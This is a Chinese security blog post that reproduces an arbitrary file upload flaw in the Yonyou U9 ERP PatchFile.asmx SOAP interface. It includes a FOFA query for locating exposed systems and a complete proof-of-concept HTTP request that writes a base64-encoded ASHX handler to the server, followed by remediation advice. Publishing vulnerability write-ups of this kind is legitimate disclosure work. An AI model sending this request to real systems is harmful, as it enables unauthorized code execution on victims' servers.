【漏洞复现】用友 U9 PatchFile.asmx 任意文件上传漏洞

于 2024-06-25 06:08:20 发布
阅读量736 收藏 10
点赞数 19
分类专栏: 漏洞复现 文章标签: web web渗透 web安全 网络安全 渗透测试 漏洞 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/139730150
版权

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

        用友U9聚焦中型和中大型制造企业,全面支持业财税档一体化、设计制造一体化、计划执行一体化、营销服务一体化、项目制造一体化等数智制造场景,赋能组织变革和商业创新,融合产业互联网资源实现连接、共享、协同,助力制造企业高质量发展。

漏洞描述

        用友 U9 PatchFile.asmx 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。

网络空间会测

Fofa

body="logo-u9.png"

image.png

漏洞复现

将ashx测试文件进行base64加密,输出 Hello, World!

<%@ WebHandler Language="C#" Class="HelloWorldHandler" %>

using System;
using System.Web;

public class HelloWorldHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        context.Response.Write("Hello, World!");
    }

    public bool IsReusable
    {
        get { return false; }
    }
}

base64:

PCVAIFdlYkhhbmRsZXIgTGFuZ3VhZ2U9IkMjIiBDbGFzcz0iSGVsbG9Xb3JsZEhhbmRsZXIiICU+Cgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5XZWI7CgpwdWJsaWMgY2xhc3MgSGVsbG9Xb3JsZEhhbmRsZXIgOiBJSHR0cEhhbmRsZXIKewogICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY29udGV4dCkKICAgIHsKICAgICAgICBjb250ZXh0LlJlc3BvbnNlLkNvbnRlbnRUeXBlID0gInRleHQvcGxhaW4iOwogICAgICAgIGNvbnRleHQuUmVzcG9uc2UuV3JpdGUoIkhlbGxvLCBXb3JsZCEiKTsKICAgIH0KCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlCiAgICB7CiAgICAgICAgZ2V0IHsgcmV0dXJuIGZhbHNlOyB9CiAgICB9Cn0=

poc:

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0
Content-Length: 898
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/SaveFile"
Accept-Encoding: gzip, deflate, br
Connection: close

<?xml version="1.0" encoding="utf-8"?>
 <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
   <SaveFile xmlns="http://tempuri.org/">
    <binData>PCVAIFdlYkhhbmRsZXIgTGFuZ3VhZ2U9IkMjIiBDbGFzcz0iSGVsbG9Xb3JsZEhhbmRsZXIiICU+Cgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5XZWI7CgpwdWJsaWMgY2xhc3MgSGVsbG9Xb3JsZEhhbmRsZXIgOiBJSHR0cEhhbmRsZXIKewogICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY29udGV4dCkKICAgIHsKICAgICAgICBjb250ZXh0LlJlc3BvbnNlLkNvbnRlbnRUeXBlID0gInRleHQvcGxhaW4iOwogICAgICAgIGNvbnRleHQuUmVzcG9uc2UuV3JpdGUoIkhlbGxvLCBXb3JsZCEiKTsKICAgIH0KCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlCiAgICB7CiAgICAgICAgZ2V0IHsgcmV0dXJuIGZhbHNlOyB9CiAgICB9Cn0=</binData>
    <path>./</path>
    <fileName>bTRkH1.ashx</fileName>
   </SaveFile>
  </soap:Body>
 </soap:Envelope>

返回true表示上传成功
image.png
访问路径:http://127.0.0.1/CS/Office/AutoUpdates/bTRkH1.ashx
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级到产品到最新版本

凝聚力安全团队
关注
  • 19
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
用友U9 PatchFile.asmx 任意文件漏洞
0xSec
01-29 784
用友U9 PatchFile.asmx接口处存在文件漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞用友-U9-PatchFile-任意文件
知黑而守白
01-12 313
用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实商业模式创新、组织变革与管理升级。用友U9多组织企业互联网应用平台 PatchFile 接口存在文件漏洞。未经身份认证的攻击者通过该漏洞恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
用友U9 存在PatchFile.asmx接口任意文件漏洞
wan___she__pi的博客
04-07 554
用友U9是由中国用友软件股份有限公司开发的一款企业级管理软件。它是用友软件公司旗下的一款ERP(企业资源计划)软件,旨在帮助企业实信息化管理和提升运营效率。提供了广泛的功能模块,包括财务管理、采购管理、销售管理、生产管理、仓储管理、人力资源管理、供应链管理等。它支持多行业、多业务模式的企业使用,并可以根据企业的需求进行个性化定制。用友U9 存在PatchFile.asmx接口任意文件漏洞
漏洞用友U9 patchfile存在任意文件漏洞
qq_34780861的博客
04-02 252
用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实商业模式创新、组织变革与管理升级。用友U9 patchfile存在任意文件漏洞,攻击者可通过该漏洞获取服务器权限。
用友U9 PatchFile(1),研发4面真题解析(网络安全岗)
最新发布
m0_60388117的博客
04-16 347
使用以下数据包向服务器发送请求,为base64加密的数据。用友U9
用友U9 PatchFile.asmx 任意文件漏洞(含批量验证poc)
weixin_43567873的博客
04-07 102
用友U9 PatchFile.asmx 任意文件漏洞(含批量验证poc)
MS17-010(永恒之蓝) 漏洞检测及利用教程
凝聚力安全团队
11-13 5989
漏洞描述: 攻击者向 Microsoft 服务器消息块SMB服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 影响版本: - Windows Vista - Windows 7 - Windows 8.1 - Windows RT 8.1 - Windows 10 - Windows Server 2008 和 Windows Server 2008 R2 - Windows Server 2012 和 Windows Server 201
CVE-2020-1938 Apache-Tomcat-Ajp (幽灵猫)文件包含漏洞
凝聚力安全团队
11-15 4488
目录漏洞描述影响版本漏洞环境搭建漏洞利用任意文件读取本地包含命令执行,测试ping dnslog反弹shell漏洞加固参考文章 漏洞描述   该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响版本 Apache Tomcat 6 Apache Tomcat 7 &lt
CVE-2012-2122 Mysql身份认证漏洞及利用
凝聚力安全团队
01-25 4174
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测msf漏洞利用漏洞加固建议参考链接 漏洞描述   当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
凝聚力安全团队
11-20 4069
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
CVE-2017-7529 Nginx越界读取缓存漏洞
凝聚力安全团队
01-26 4018
目录漏洞描述影响版本漏洞环境搭建漏洞原理漏洞利用漏洞加固参考链接 漏洞描述   从0.5.6到1.13.2(含)的Nginx版本容易受到nginx范围过滤器模块中整数溢出漏洞的攻击,从而导致特制请求触发的潜在敏感信息泄漏。 影响版本 Nginx 0.5.6 – 1.13.2 漏洞环境搭建 使用docker 启动vulhub中的CVE-2017-7529环境 docker快速入门以及漏洞环境搭建 漏洞原理 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,
DS_Store文件泄露
凝聚力安全团队
11-02 3459
这里写目录标题 利用工具: https://github.com/lijiejie/ds_store_exp python ds_store_exp.py http://www.example.com/.DS_Store
CVE-2020-0796 漏洞利用教程
凝聚力安全团队
10-30 3052
目录漏洞描述影响版本漏洞检测漏洞利用蓝屏攻击远程代码执行本地提权修建议 漏洞描述   Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞,也称为“ Windows SMBv3客户端/服务器远程执行代码漏洞”。 影响版本 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于ARM64的系统) Windows 10 1903版(用于基于x64的系统) 适用于32位系统的Windows 10版本1909 Windo
CVE-2020-11107 XAMPP 任意命令执行漏洞(用户提权)
凝聚力安全团队
11-13 2347
目录漏洞描述漏洞影响漏洞检测漏洞利用修建议参考链接 漏洞描述 漏洞影响 Apache Friends XAMPP <7.2.29 Apache Friends XAMPP 7.3.,<7.3.16 Apache Friends XAMPP 7.4.,<7.4.4 漏洞检测 漏洞利用 修建议 参考链接 ...
(CVE-2019-14322)Pallets Werkzeug 0.15.4 路径遍历漏洞
凝聚力安全团队
08-03 2341
漏洞描述 在0.15.5之前的Pallets Werkzeug中,shareddatmiddleware错误处理了Windows路径名中的驱动器名。 漏洞影响 小于 Werkzeug 0.15.5 FOFA title=“Odoo” 漏洞 Poc: /base/static/c:/windows/win.ini /base_import/static/c:/windows/win.ini /web/static/c:/windows/win.ini ...
CVE-2016-5734 Phpmyadmin后台代码执行漏洞
凝聚力安全团队
01-24 2251
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接 漏洞描述   CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5
CVE-2017-12615 Tomcat PUT 任意文件 漏洞利用教程
凝聚力安全团队
11-14 2171
目录漏洞描述影响版本漏洞环境搭建漏洞检测漏洞利用漏洞加固 漏洞描述   在启用HTTP PUT的Windows上运行Apache Tomcat 7.0.0至7.0.79时(例如,通过将Default的只读初始化参数设置为false),可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。 影响版本 tomcat 7.0.0至7.0.79 漏洞环境搭建 漏洞检测 漏洞利用 漏洞加固 ...
MS08-067 RPC请求缓冲区溢出漏洞利用
凝聚力安全团队
11-13 1814
Windows 系统上的服务器服务中存在一个远程执行代码漏洞。 该漏洞是由于服务不正确地处理特制的 RPC 请求导致的。 成功利用此漏洞的攻击者可以完全控制受影响的系统。 影响系统 - Windows Vista - Windows 2000 Service - Windows Server 2008 - Windows Server 2003 - Windows XP
git apply -v patchfile.patch输出得log写入txt
06-07
要将`git apply -v patchfile.patch`的输出日志写入txt文件,可以使用以下命令: ``` git apply -v patchfile.patch | tee log.txt ``` 这将会将命令输出到终端并将其写入log.txt文件中。如果log.txt文件不存在,则会创建一个。如果文件已经存在,则会将新的输出追加到文件末尾。 注意:这个命令只会将`git apply -v`的输出日志写入txt文件,不会将错误信息写入文件。如果想要将错误信息也写入文件,可以使用以下命令: ``` git apply -v patchfile.patch 2>&1 | tee log.txt ``` 这个命令会将标准错误输出和标准输出一起写入log.txt文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值